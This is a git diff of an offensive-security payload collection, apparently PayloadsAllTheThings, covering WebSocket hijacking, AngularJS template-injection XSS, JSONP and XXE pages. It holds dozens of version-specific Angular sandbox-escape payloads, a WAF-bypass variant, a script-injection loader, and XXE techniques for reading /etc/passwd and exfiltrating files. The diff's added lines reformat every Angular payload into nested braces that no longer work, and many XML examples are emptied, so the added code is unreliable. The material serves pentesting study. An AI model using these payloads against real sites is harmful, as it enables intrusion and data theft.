Hijacking (CSWSH) If the WebSocket handshake is not correctly protected using a CSRF token or a @@ -104,13 +102,13 @@ data from the WebSocket to the attacker: ```html ``` @@ -120,16 +118,14 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request, you have to add this value as a 2nd parameter to the `WebSocket` function call in order to add this header. - ## Labs -* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling) - +- [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling) ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) -- [Hacking with WebSockets - Qualys - Mike Schema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) +- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) - [Hacktricks - CSWSH](https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh) -- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html) \ No newline at end of file +- [Streamlining Websocket Pentesting with wsrepl - Andrez Konstantinov - 18 Jul 2023](https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index d34dea2..12add24 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -1,5 +1,5 @@ #Google.com: -"> +"> "> "> "> diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index e6c6170..463cb22 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -13,7 +13,11 @@ The following payloads are based on Client Side Template Injection. AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) ```javascript -{{constructor.constructor('alert(1)')()}} +{ + { + constructor.constructor("alert(1)")(); + } +} ``` AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) @@ -27,9 +31,21 @@ Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com. AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) ```javascript -{{0[a='constructor'][a]('alert(1)')()}} -{{$eval.constructor('alert(1)')()}} -{{$on.constructor('alert(1)')()}} +{ + { + (0)[(a = "constructor")][a]("alert(1)")(); + } +} +{ + { + $eval.constructor("alert(1)")(); + } +} +{ + { + $on.constructor("alert(1)")(); + } +} ``` AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) @@ -54,101 +70,176 @@ AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) AngularJS 1.5.0 - 1.5.8 ```javascript -{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} +{ + { + x = { y: "".constructor.prototype }; + x["y"].charAt = [].join; + $eval("x=alert(1)"); + } +} ``` AngularJS 1.4.0 - 1.4.9 ```javascript -{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} +{ + { + "a".constructor.prototype.charAt = [].join; + $eval("x=1} } };alert(1)//"); + } +} ``` AngularJS 1.3.20 ```javascript -{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} +{ + { + "a".constructor.prototype.charAt = [].join; + $eval("x=alert(1)"); + } +} ``` AngularJS 1.3.19 ```javascript -{{ - 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; - $eval('x=alert(1)//'); -}} +{ + { + "a"[ + { toString: false, valueOf: [].join, length: 1, 0: "__proto__" } + ].charAt = [].join; + $eval("x=alert(1)//"); + } +} ``` AngularJS 1.3.3 - 1.3.18 ```javascript -{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; - 'a'.constructor.prototype.charAt=[].join; - $eval('x=alert(1)//'); }} +{ + { + { + } + [{ toString: [].join, length: 1, 0: "__proto__" }].assign = [].join; + "a".constructor.prototype.charAt = [].join; + $eval("x=alert(1)//"); + } +} ``` AngularJS 1.3.1 - 1.3.2 ```javascript -{{ - {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; - 'a'.constructor.prototype.charAt=''.valueOf; - $eval('x=alert(1)//'); -}} +{ + { + { + } + [{ toString: [].join, length: 1, 0: "__proto__" }].assign = [].join; + "a".constructor.prototype.charAt = "".valueOf; + $eval("x=alert(1)//"); + } +} ``` AngularJS 1.3.0 ```javascript -{{!ready && (ready = true) && ( - !call - ? $$watchers[0].get(toString.constructor.prototype) - : (a = apply) && - (apply = constructor) && - (valueOf = call) && - (''+''.toString( - 'F = Function.prototype;' + - 'F.apply = F.a;' + - 'delete F.a;' + - 'delete F.valueOf;' + - 'alert(1);' - )) - );}} +{ + { + !ready && + (ready = true) && + (!call + ? $$watchers[0].get(toString.constructor.prototype) + : (a = apply) && + (apply = constructor) && + (valueOf = call) && + "" + + "".toString( + "F = Function.prototype;" + + "F.apply = F.a;" + + "delete F.a;" + + "delete F.valueOf;" + + "alert(1);" + )); + } +} ``` AngularJS 1.2.24 - 1.2.29 ```javascript -{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} +{ + { + "a".constructor.prototype.charAt = "".valueOf; + $eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'"); + } +} ``` AngularJS 1.2.19 - 1.2.23 ```javascript -{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} +{ + { + toString.constructor.prototype.toString = + toString.constructor.prototype.call; + ["a", "alert(1)"].sort(toString.constructor); + } +} ``` AngularJS 1.2.6 - 1.2.18 ```javascript -{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} +{ + { + (_ = "".sub).call.call( + {}[($ = "constructor")].getOwnPropertyDescriptor(_.__proto__, $).value, + 0, + "alert(1)" + )(); + } +} ``` AngularJS 1.2.2 - 1.2.5 ```javascript -{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} +{ + { + "a"[{ toString: [].join, length: 1, 0: "__proto__" }].charAt = "".valueOf; + $eval( + "x='" + (y = "if(!window\\u002ex)alert(window\\u002ex=1)") + eval(y) + "'" + ); + } +} ``` AngularJS 1.2.0 - 1.2.1 ```javascript -{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} +{ + { + a = "constructor"; + b = {}; + a.sub.call.call( + b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value, + 0, + "alert(1)" + )(); + } +} ``` AngularJS 1.0.1 - 1.1.5 and Vue JS ```javascript -{{constructor.constructor('alert(1)')()}} +{ + { + constructor.constructor("alert(1)")(); + } +} ``` ### Advanced bypassing XSS @@ -156,31 +247,189 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_) ```javascript -{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} +{ + { + x = valueOf.name.constructor.fromCharCode; + constructor.constructor(x(97, 108, 101, 114, 116, 40, 49, 41))(); + } +} ``` AngularJS (without `'` single and `"` double quotes and `constructor` string) ```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +{ + { + x = 767015343; + y = 50986827; + a = x.toString(36) + y.toString(36); + b = {}; + a.sub.call.call( + b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value, + 0, + toString()[a].fromCharCode( + 112, + 114, + 111, + 109, + 112, + 116, + 40, + 100, + 111, + 99, + 117, + 109, + 101, + 110, + 116, + 46, + 100, + 111, + 109, + 97, + 105, + 110, + 41 + ) + )(); + } +} ``` ```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +{ + { + x = 767015343; + y = 50986827; + a = x.toString(36) + y.toString(36); + b = {}; + a.sub.call.call( + b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value, + 0, + toString()[a].fromCodePoint( + 112, + 114, + 111, + 109, + 112, + 116, + 40, + 100, + 111, + 99, + 117, + 109, + 101, + 110, + 116, + 46, + 100, + 111, + 109, + 97, + 105, + 110, + 41 + ) + )(); + } +} ``` ```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +{ + { + x = 767015343; + y = 50986827; + a = x.toString(36) + y.toString(36); + a.sub.call.call( + {}[a].getOwnPropertyDescriptor(a.sub.__proto__, a).value, + 0, + toString()[a].fromCharCode( + 112, + 114, + 111, + 109, + 112, + 116, + 40, + 100, + 111, + 99, + 117, + 109, + 101, + 110, + 116, + 46, + 100, + 111, + 109, + 97, + 105, + 110, + 41 + ) + )(); + } +} ``` ```javascript -{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +{ + { + x = 767015343; + y = 50986827; + a = x.toString(36) + y.toString(36); + a.sub.call.call( + {}[a].getOwnPropertyDescriptor(a.sub.__proto__, a).value, + 0, + toString()[a].fromCodePoint( + 112, + 114, + 111, + 109, + 112, + 116, + 40, + 100, + 111, + 99, + 117, + 109, + 101, + 110, + 116, + 46, + 100, + 111, + 109, + 97, + 105, + 110, + 41 + ) + )(); + } +} ``` AngularJS bypass Waf [Imperva] ```javascript -{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}} +{ + { + x = ["constr", "uctor"]; + a = x.join(""); + b = {}; + a.sub.call.call( + b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub), a).value, + 0, + "pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)" + )(); + } +} ``` ### Blind XSS @@ -195,8 +444,7 @@ AngularJS bypass Waf [Imperva] }} ``` - -Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsis) and Gareth Heyes (PortSwigger) +Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger) ```javascript {{ @@ -276,16 +524,32 @@ Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsis) and Gareth Heyes (Po 1.5.9 - 1.5.11 by Jan Horn (Cure53, now works at Google Project Zero) ```javascript -{{ - c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply; - c.$eval=b;op=$root.$$phase; - $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; - C=c.$apply(c);$root.$$phase=op;$root.$digest=od; - B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};"); - m1=B($$asyncQueue.pop().expression,null,$root); - m2=B(C,null,m1);[].push.apply=m2;a=''.sub; - $eval('a(b.c)');[].push.apply=a; -}} +{ + { + c = "".sub.call; + b = "".sub.bind; + a = "".sub.apply; + c.$apply = $apply; + c.$eval = b; + op = $root.$$phase; + $root.$$phase = null; + od = $root.$digest; + $root.$digest = {}.toString; + C = c.$apply(c); + $root.$$phase = op; + $root.$digest = od; + B = C(b, c, b); + $evalAsync( + "astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};" + ); + m1 = B($$asyncQueue.pop().expression, null, $root); + m2 = B(C, null, m1); + [].push.apply = m2; + a = "".sub; + $eval("a(b.c)"); + [].push.apply = a; + } +} ``` ## Automatic Sanitization @@ -332,4 +596,4 @@ When doing a code review, you want to make sure that no user input is being trus - [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) - [Angular Security](https://angular.io/guide/security) - [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b) -- [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson - 2024-07-11](https://matanber.com/blog/4-char-csti) \ No newline at end of file +- [Bidding Like a Billionaire - Stealing NFTs With 4-Char CSTIs - Matan Berson - 2024-07-11](https://matanber.com/blog/4-char-csti) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index ece194e..0d68df2 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -2,10 +2,10 @@ > An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. -**Internal Entity**: If an entity is declared within a DTD it is called as internal entity. +**Internal Entity**: If an entity is declared within a DTD it is called as internal entity. Syntax: `` -**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`. +**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`. Syntax: `` ## Summary @@ -24,8 +24,8 @@ Syntax: `` - [Yaml attack](#yaml-attack) - [Parameters Laugh attack](#parameters-laugh-attack) - [Exploiting Error Based XXE](#exploiting-error-based-xxe) - - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) - - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) + - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) + - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) - [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) @@ -91,23 +91,22 @@ Syntax: `` ``` - [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. ```ps1 - python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs + python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs ``` ## Labs -* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection) - * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files) - * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf) - * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction) - * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities) - * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration) - * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) - * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack) - * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload) - * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd) -* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop) - +- [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection) + - [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files) + - [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf) + - [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction) + - [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities) + - [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration) + - [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) + - [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack) + - [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload) + - [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd) +- [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop) ## Detect the vulnerability @@ -128,7 +127,7 @@ It might help to set the `Content-Type: application/xml` in the request when sen ### Classic XXE -We try to display the content of the file `/etc/passwd` +We try to display the content of the file `/etc/passwd` ```xml ]>&test; @@ -145,14 +144,14 @@ We try to display the content of the file `/etc/passwd` ```xml - ]>&xxe; ``` ```xml - ]>&xxe; ``` @@ -196,15 +195,13 @@ We try to display the content of the file `/etc/passwd` ### XInclude attacks -When you can't modify the **DOCTYPE** element use the **XInclude** to target +When you can't modify the **DOCTYPE** element use the **XInclude** to target ```xml ``` - - ## Exploiting XXE to perform SSRF attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -218,7 +215,6 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo &xxe; ``` - ## Exploiting XXE to perform a deny of service :warning: : These attacks might kill the service or the server, do not use them on the production. @@ -265,7 +261,6 @@ A variant of the Billion Laughs attack, using delayed interpretation of paramete ``` - ## Exploiting Error Based XXE ### Error Based - Using Local DTD File @@ -282,7 +277,8 @@ Short list of dtd files already stored on Linux systems; list them with `locate The file `/usr/share/xml/fontconfig/fonts.dtd` has an injectable entity `%constant` at line 148: `` -The final payload becomes: +The final payload becomes: + ```xml @@ -297,7 +293,6 @@ The final payload becomes: Text ``` - ### Error Based - Using Remote DTD **Payload to trigger the XXE** @@ -332,17 +327,13 @@ The final payload becomes: Let's break down the payload: 1. `` - This line defines an external entity named file that references the content of the file /etc/passwd (a Unix-like system file containing user account details). + This line defines an external entity named file that references the content of the file /etc/passwd (a Unix-like system file containing user account details). 2. `">` - This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the `/etc/passwd` content) to the end of the file path. The `%` is a URL-encoded '`%`' used to reference an entity inside an entity definition. + This line defines an entity eval that holds another entity definition. This other entity (error) is meant to reference a nonexistent file and append the content of the file entity (the `/etc/passwd` content) to the end of the file path. The `%` is a URL-encoded '`%`' used to reference an entity inside an entity definition. 3. `%eval;` - This line uses the eval entity, which causes the entity error to be defined. + This line uses the eval entity, which causes the entity error to be defined. 4. `%error;` - Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of `/etc/passwd`. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of `/etc/passwd` would be disclosed as part of the error message, revealing sensitive information. - - - - + Finally, this line uses the error entity, which attempts to access a nonexistent file with a path that includes the content of `/etc/passwd`. Since the file doesn't exist, an error will be thrown. If the application reports back the error to the user and includes the file path in the error message, then the content of `/etc/passwd` would be disclosed as part of the error message, revealing sensitive information. ## Exploiting blind XXE to exfiltrate data out-of-band @@ -424,10 +415,10 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) - ## XXE with local DTD In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: + ```xml ]> &test; @@ -461,36 +452,41 @@ Assuming payloads such as the previous return a verbose error. You can start poi ]> ``` + ### Cisco WebEx + ``` Your DTD code %local_dtd; ``` + ### Citrix XenMobile Server + ``` Your DTD code %local_dtd; ``` + [Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - -## WAF Bypasses +## WAF Bypasses ### Bypass via character encoding XML parsers uses 4 methods to detect encoding: -* HTTP Content Type: `Content-Type: text/xml; charset=utf-8` -* Reading Byte Order Mark (BOM) -* Reading first symbols of document - * UTF-8 (3C 3F 78 6D) - * UTF-16BE (00 3C 00 3F) - * UTF-16LE (3C 00 3F 00) -* XML declaration: `` + +- HTTP Content Type: `Content-Type: text/xml; charset=utf-8` +- Reading Byte Order Mark (BOM) +- Reading first symbols of document + - UTF-8 (3C 3F 78 6D) + - UTF-16BE (00 3C 00 3F) + - UTF-16LE (3C 00 3F 00) +- XML declaration: `` | Encoding | BOM | Example | | -|----------|----------|-------------------------------------|--------------| +| -------- | -------- | ----------------------------------- | ------------ | | UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ... @@ -568,7 +564,7 @@ Ref. ``` -*xxe.xml* +_xxe.xml_ ```xml @@ -589,7 +585,7 @@ Ref. Format of an Open XML file (inject the payload in any .xml file): -- /_rels/.rels +- /\_rels/.rels - [Content_Types].xml - Default Main Document Part - /word/document.xml @@ -666,7 +662,7 @@ And using FTP instead of HTTP allows to retrieve much larger files. ```xml -"> +"> ``` Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv): @@ -690,7 +686,6 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE %external; ``` - ## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 @@ -729,29 +724,29 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 ## References -* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) -* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) -* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka -* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) -* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) -* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) -* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) -* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) -* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify -* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht -* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals -* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 -* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG -* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) -* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov -* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) -* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau -* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) -* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10) -* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) -* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon -* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/resources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK -* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin -* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) -* [Data exfiltration using XXE on a hardened server - Ritik Singh - Jan 29, 2022](https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac) -* [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - optistream](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe) \ No newline at end of file +- [XML External Entity (XXE) Processing - OWASP]() +- [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) +- [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka +- [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) +- [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +- [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) +- [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) +- [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) +- [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify +- [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht +- [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals +- [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 +- [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG +- [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) +- [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov +- [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) +- [Automating local 